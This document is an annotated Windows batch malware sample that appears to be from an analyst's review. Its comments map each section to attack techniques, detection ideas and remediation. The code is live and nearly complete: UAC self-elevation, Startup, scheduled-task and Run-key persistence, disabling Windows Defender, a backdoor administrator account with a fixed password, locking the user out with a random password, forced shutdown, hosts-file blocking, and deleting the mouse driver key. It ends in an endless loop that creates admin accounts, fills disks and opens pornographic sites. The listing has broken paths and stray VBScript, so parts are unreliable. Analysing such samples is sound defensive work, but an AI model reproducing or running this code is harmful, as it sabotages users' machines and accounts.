:: Analyst annotation: Windows batch sample. This first section only decides
:: whether the process is already elevated.
:: NOTE(review): path separators appear to have been lost in this listing, so
:: treat the path strings as approximate when turning them into detections.
@echo off
:: NOTE(review): "shell:startup" is an Explorer shell shortcut rather than a
:: cmd.exe command; its effect when run from a batch file is not established here.
shell:startup
:: Elevation probe: runs cacls.exe (the SysWOW64 copy when the architecture
:: variable equals amd64, otherwise the system32 copy) against the SYSTEM
:: registry hive file and discards all output. Only the exit code is used.
:: The call is expected to fail for a non-elevated process - TODO confirm.
IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%SysWOW64cacls.exe" "%SYSTEMROOT%SysWOW64configsystem"
)
ELSE (
>nul 2>&1 "%SYSTEMROOT%system32cacls.exe" "%SYSTEMROOT%system32configsystem"
)
:: Non-zero exit code: jump to the UAC prompt section. Zero: continue as admin.
:: Detection idea: cacls.exe invoked on the SYSTEM hive path from a script is
:: an uncommon command line and a usable process-creation signal.
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:: Self-elevation through a UAC consent prompt (requires the user to approve).
:: Writes a two-line VBScript named getadmin.vbs under the TEMP location, which
:: calls Shell.Application ShellExecute with the "runas" verb to relaunch this
:: batch file through cmd.exe /c with the original arguments.
:: Detection idea: creation and execution of getadmin.vbs from the TEMP
:: location, followed by a cmd.exe child started with the runas verb.
:: Mitigation: users without administrator credentials cannot approve the prompt.
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%getadmin.vbs"
:: Keeps the original command-line arguments so they can be passed through.
set params= %*
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%getadmin.vbs"
:: Runs the generated script, then deletes it and ends this non-elevated instance.
"%temp%getadmin.vbs"
del "%temp%getadmin.vbs"
exit /B
:: Elevated path: saves the current directory, then switches to the directory
:: that holds this script.
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
:: Persistence (ATT&CK T1547.001 and T1053.005): copies this script into the
:: current user's Startup folder and registers a weekly scheduled task.
:: Indicators on this page: task name "Mytaskssysf", file name "fbomber.bat",
:: start time 12:00, and a hard-coded profile name "Jarvic" in the task path
:: (the copy command uses the current user name instead).
:: Detection idea: Security event 4698 (scheduled task created, when object
:: access auditing is enabled) and new script files in Startup folders.
copy %0 "C:Users"%username%"AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup" >nul
SCHTASKS /CREATE /SC WEEKLY /D 1 /TN "Mytaskssysf" /TR "C:UsersJarvicAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupfbomber.bat" /ST 12:00 /RU "%username%" >nul
:: Defence impairment (ATT&CK T1562.001): sets the WinDefend service start type
:: to disabled and then requests that the service stop.
:: NOTE(review): with Tamper Protection enabled these changes are expected to
:: be rejected or ignored on current Windows builds - confirm for the build in scope.
:: Detection idea: sc.exe command lines that name WinDefend.
sc config WinDefend start= disabled >nul
sc stop WinDefend >nul
:: Writes the policy value DisableAntiSpyware = 1 under the Windows Defender
:: policy key in HKLM. Detection idea: alert on any write to this value and
:: verify it is absent or 0 during remediation.
set key="HKLMSOFTWAREPoliciesMicrosoftWindows Defender"
reg add %key% /v DisableAntiSpyware /t REG_DWORD /d 1 /f >nul
:: Account creation (ATT&CK T1136.001): adds the local user kon7_r4y, puts it in
:: the local administrators group, then sets its password to the fixed string
:: shown on the third line. Both strings are usable as indicators.
:: Detection idea: Security events 4720 (account created), 4732 (member added
:: to a local group) and 4724 (password reset attempt) in close succession.
net user kon7_r4y /add >nul
net localgroup administrators kon7_r4y /add >nul
net user kon7_r4y kon7_r4y@666 >nul
:: Account lockout (ATT&CK T1531): resets the logged-in user's password to the
:: value of the RANDOM pseudo-variable, which cmd.exe draws from 0 to 32767.
:: The new value is not recorded anywhere in this script.
:: Forced shutdown (ATT&CK T1529): /s /f with a 350 second timer, which is
:: closer to six minutes than the five the original comment stated.
:: Response: "shutdown /a" cancels a pending timed shutdown.
net user "%username%" %random% >nul
shutdown /s /f /t 350 >nul
:: Run-key persistence (ATT&CK T1547.001): registers this script's path under
:: the CurrentVersion Run key in both HKLM and HKCU so it starts at logon.
:: Indicator on this page: value name "startAPI" in the HKLM command.
:: NOTE(review): the HKCU command gives no value name after /v; what reg.exe
:: does with that command line is not established here.
:: Remediation: review both Run keys for values pointing at a .bat file.
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d %0 /f >nul
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d %0 /f >nul
:: Hosts-file tampering: attempts to map the listed domains to the loopback
:: address so that local name resolution for them fails to reach the real site.
:: fileDIR holds the hosts file path on the home drive; Destloc is 127.0.0.1.
:: NOTE(review): each echo line carries two output redirections; whether the
:: entries actually land in the hosts file should be confirmed in a sandbox.
:: Triage: inspect the hosts file for 127.0.0.1 entries naming these domains
:: and restore it from a known-good copy. File-integrity monitoring on the
:: hosts file covers this technique generally.
set fileDIR=%homedrive%Windowssystem32driversetc"hosts"
set Destloc=127.0.0.1
echo %Destloc% facebook.com >> %fileDIR% >nul
echo %Destloc% youtube.com >> %fileDIR% >nul
echo %Destloc% speedtest.net >> %fileDIR% >nul
echo %Destloc% instagram.com >> %fileDIR% >nul
echo %Destloc% google.com >> %fileDIR% >nul
echo %Destloc% web.whatsapp.com >> %fileDIR% >nul
echo %Destloc% twitter.com >> %fileDIR% >nul
echo %Destloc% daraz.com >> %fileDIR% >nul
echo %Destloc% netflix.com >> %fileDIR% >nul
:: Input-device sabotage: targets the Mouclass (mouse class driver) service key.
:: The original comment says "temporarily", but nothing in this section
:: restores the key. Every command in the section appears twice in the listing.
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
:: Deletes the whole service key. No /f is given, so reg.exe is expected to ask
:: for confirmation - TODO confirm behaviour when run non-interactively.
reg delete %key%
reg delete %key%
:: Recreates the key with Start = 4, the "disabled" service start type.
:: Remediation: the key delete removes every other value as well, so restore
:: the full Mouclass key from a clean machine of the same build or from backup
:: rather than only resetting Start.
:: Detection idea: registry writes or deletes under Services for input class drivers.
reg add %key% /v Start /t REG_DWORD /d 4
reg add %key% /v Start /t REG_DWORD /d 4
:: Optical-drive eject loop. These lines are VBScript syntax, not batch syntax:
:: they create a WMPlayer.OCX.7 object, walk its cdromCollection and call Eject
:: on every drive (the inner loop appears twice), then sleep and repeat forever.
:: The sleep argument is 50, which wscript.sleep reads as milliseconds, not the
:: half minute the original comment stated.
:: NOTE(review): cmd.exe does not interpret VBScript. How far execution gets
:: past this point when the file runs as a batch script should be confirmed in
:: a sandbox before assuming that later sections execute.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 50
loop
:: Endless resource-exhaustion loop: the label below is re-entered by the final
:: goto with no delay and no exit condition.
:Fun
:: Each pass creates one more local account (ATT&CK T1136.001) whose name is a
:: RANDOM value, adds it to the local administrators group and gives it a
:: second RANDOM value as password.
:: Triage: list local accounts with purely numeric names, remove them from the
:: administrators group and delete them. Expect bursts of events 4720 and 4732.
set fVALUE=%random%
net user %fVALUE% /add >nul
net localgroup administrators %fVALUE% /add >nul
net user %fVALUE% %random% >nul
:: Requests a 69000000-byte file named "systemp" on drives D, E, F and the home
:: drive. That is about 66 MiB each, not the 500MB the original comment stated.
:: Triage: search fixed drives for a file with this name and size.
fsutil file createnew D:systemp 69000000 >nul
fsutil file createnew E:systemp 69000000 >nul
fsutil file createnew F:systemp 69000000 >nul
fsutil file createnew %homedrive%systemp 69000000 >nul
:: Opens three adult-content sites in Chrome and again in Edge on every pass.
start chrome "pornhub.com"
start chrome "xhamster.com"
start chrome "jav.guru"
start msedge "pornhub.com"
start msedge "xhamster.com"
start msedge "jav.guru"
:: Launches eight desktop programs per pass. Windows accumulate without bound
:: because nothing waits for or closes them.
:: Detection idea: one cmd.exe parent spawning net.exe, fsutil.exe, browsers
:: and Office or accessory programs at a sustained high rate.
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto Fun